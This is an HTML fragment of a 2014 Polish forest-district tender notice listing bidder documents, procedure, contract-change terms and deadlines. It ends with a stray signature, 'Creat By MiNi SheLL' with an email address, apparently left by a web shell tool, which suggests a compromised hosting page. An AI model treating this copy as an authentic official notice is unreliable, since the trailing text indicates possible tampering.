<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	 formularz ofertowy (wg wzoru załącznika SIWZ) wraz z kosztorysami ofertowymi 
obejmującymi zestawienie wszelkich prac niezbędnych do wykonania zamierzenia budowlanego opisanego w dokumentacji projektowej w oparciu o załączony przedmiar i kosztorys.

2)	 zobowiązanie do udzielenia gwarancji jakości na wykonane roboty na okres minimum 36 
miesięcy o daty odbioru końcowego w formularzu ofertowym (wg wzoru załącznika SIWZ)

3)	 w przypadku podmiotów występujących wspólnie pełnomocnictwo do złożenia oferty w 
sprawie zamówienia publicznego. Dołączone do oferty pełnomocnictwo powinno jednoznacznie określać postępowanie do którego się odnosi i precyzować zakres umocowania oraz wymieniać wszystkich wykonawców którzy wspólnie ubiegają się o udzielenie zamówienia.

4)	 w przypadku gdy upoważnię do podpisania oferty nie wynika z dokumentów rejestrowych do 
oferty należy załączyć stosowne pełnomocnictwo w oryginale do złożenia oferty. Dołączone do oferty pełnomocnictwo powinno jednoznacznie określać postępowanie do którego się odpisu i precyzować zakres umocowania.

5)	 wykaz części zamówienia które Wykonawca zamierza powierzyć podwykonawcy(om) wg 
wzoru załącznika nr 9 SIWZ.


6)	 wykaz podwykonawców na których zasoby Wykonawca powołuje się na zasadach określonych 
w art. 26 ust. 2b ustawy Prawo zamówień publicznych (wg wzoru załącznika 10 SIWZ)

7)	 potwierdzenie wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Stosownie do art. 144 ustawy Pzp ustala się możliwość zmiany postanowień zawartej umowy: 
a.  w zakresie należnego Wykonawcy wynagrodzenia w przypadku ustawowej zmiany wysokości stawki podatku VAT, z zastrzeżeniem zachowania takiej samej stawki wynagrodzenia netto za wykonanie przedmiotu zamówienia.
b. w zakresie zmniejszenia wielkości i wartości zamówienia oraz zmiany terminu wykonania w stosunku do podanych w umowie w sytuacji gdy niemożność dotrzymania terminu lub wykonania przedmiotu zamówienia w zakresie przewidzianym umową zostanie spowodowana jedną z niżej wymienionych okoliczności takich jak: 
- klęska żywiołowa, 
- niesprzyjające warunki atmosferyczne tj. susza, pożar, podtopienia, powódź, huragan, śnieżyce, gradacja 
  gryzoni lub owadów
- niesprzyjające warunki ekonomiczne polegające na spadku popytu na rynku drewna i zarazem spadku 
  przychodów Zamawiającego,  
- zmiana planu finansowego Zamawiającego, 
 - strajki lub protesty uniemożliwiające w sposób pośredni lub bezpośredni terminowe wykonanie 
   przedmiotu zamówienia.
2.	Wykonawca zobowiązany będzie do naprawy nawierzchni i profilu drogi uszkodzonej przez niego w trakcie wykonywania prac (m.in. podczas przejazdu przez drogi leśne w celu dojazdu do konkretnego miejsca związanego z przedmiotem zamówienia, itp.). W takiej sytuacji Wykonawca dokona naprawy staraniem własnym i na własny koszt w wyznaczonym terminie, natomiast w przypadku niewykonania powyższego, zapłaci karę umowną w wysokości 5 000,00 zł netto plus podatek VAT w ustawowej  wysokości za każde 100,00 mb uszkodzonego odcinka.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_polczyn/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_polczyn/zamowienia_publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2014 godzina 08:00, miejsce: Sekretariat Nadleśnictwa Połczyn 
ul. 15 Grudnia 12
78-320 Połczyn-Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com